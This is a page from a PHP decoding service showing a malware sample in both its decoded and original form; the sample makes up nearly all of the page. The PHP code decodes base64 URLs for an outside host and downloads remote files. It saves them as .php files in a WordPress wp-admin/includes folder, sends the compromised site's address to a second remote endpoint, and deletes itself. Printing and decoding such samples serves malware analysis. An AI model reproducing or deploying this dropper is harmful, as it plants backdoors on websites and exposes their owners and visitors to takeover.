Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

malware<?phperror_reporting(0);functionbase64_url_decode($input){returnbase64_decode(strtr..

Decoded Output download

malware<?phperror_reporting(0);functionbase64_url_decode($input){returnbase64_decode(strtr($input,'-_','+/'));}$remote_file_urls_base64=array('aHR0cDovL3l0a2o3Ny5jb20vaW5jbHVkZS9xcmNvZGUvdGVtcC50eHQ=','aHR0cDovL3l0a2o3Ny5jb20vaW5jbHVkZS9xcmNvZGUvbG9ncy50eHQ=');$remote_file_urls=array();foreach($remote_file_urls_base64as$url_base64){$remote_file_urls[]=base64_url_decode($url_base64);}$save_to_dir='wp-admin/includes/';$url="http".(isset($_SERVER['HTTPS'])?"s":"")."://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];$current_protocol=$_SERVER['REQUEST_SCHEME'];$current_domain=$_SERVER['HTTP_HOST'];$current_url=$current_protocol."://".$current_domain;$failure_notification_sent=false;$success_notification_sent=false;foreach($remote_file_urlsas$remote_file_url){$file_name=basename($remote_file_url);$file_name=str_replace('.txt','.php',$file_name);$save_to_path=$save_to_dir.$file_name;$ch=curl_init($remote_file_url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);$file_content=curl_exec($ch);curl_close($ch);if($file_content===false){if(!$failure_notification_sent){$urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);$curl=curl_init($decoded_url.$url.'&note=');curl_exec($curl);curl_close($curl);$failure_notification_sent=true;}echo"
";}else{$save_result=file_put_contents($save_to_path,$file_content);if($save_result!==false){if(!$success_notification_sent){$urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);$curl=curl_init($decoded_url.$current_url.'/'.$save_to_dir.'temp.php'.'&note=');curl_exec($curl);curl_close($curl);$success_notification_sent=true;}$file=__FILE__;unlink($file);}else{if(!$failure_notification_sent){$urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);$curl=curl_init($decoded_url.$url.'&note=');curl_exec($curl);curl_close($curl);$failure_notification_sent=true;}}}}?>

Did this file decode correctly?

Original Code

malware<?phperror_reporting(0);functionbase64_url_decode($input){returnbase64_decode(strtr($input,'-_','+/'));}$remote_file_urls_base64=array('aHR0cDovL3l0a2o3Ny5jb20vaW5jbHVkZS9xcmNvZGUvdGVtcC50eHQ=','aHR0cDovL3l0a2o3Ny5jb20vaW5jbHVkZS9xcmNvZGUvbG9ncy50eHQ=');$remote_file_urls=array();foreach($remote_file_urls_base64as$url_base64){$remote_file_urls[]=base64_url_decode($url_base64);}$save_to_dir='wp-admin/includes/';$url="http".(isset($_SERVER['HTTPS'])?"s":"")."://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];$current_protocol=$_SERVER['REQUEST_SCHEME'];$current_domain=$_SERVER['HTTP_HOST'];$current_url=$current_protocol."://".$current_domain;$failure_notification_sent=false;$success_notification_sent=false;foreach($remote_file_urlsas$remote_file_url){$file_name=basename($remote_file_url);$file_name=str_replace('.txt','.php',$file_name);$save_to_path=$save_to_dir.$file_name;$ch=curl_init($remote_file_url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);$file_content=curl_exec($ch);curl_close($ch);if($file_content===false){if(!$failure_notification_sent){$urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);$curl=curl_init($decoded_url.$url.'&note=');curl_exec($curl);curl_close($curl);$failure_notification_sent=true;}echo"\n";}else{$save_result=file_put_contents($save_to_path,$file_content);if($save_result!==false){if(!$success_notification_sent){$urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);$curl=curl_init($decoded_url.$current_url.'/'.$save_to_dir.'temp.php'.'&note=');curl_exec($curl);curl_close($curl);$success_notification_sent=true;}$file=__FILE__;unlink($file);}else{if(!$failure_notification_sent){$urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);$curl=curl_init($decoded_url.$url.'&note=');curl_exec($curl);curl_close($curl);$failure_notification_sent=true;}}}}?>

Function Calls

None

Variables

None

Stats

MD5 16a6aafa9800cf06cb044850f7a253b0
Eval Count 0
Decode Time 55 ms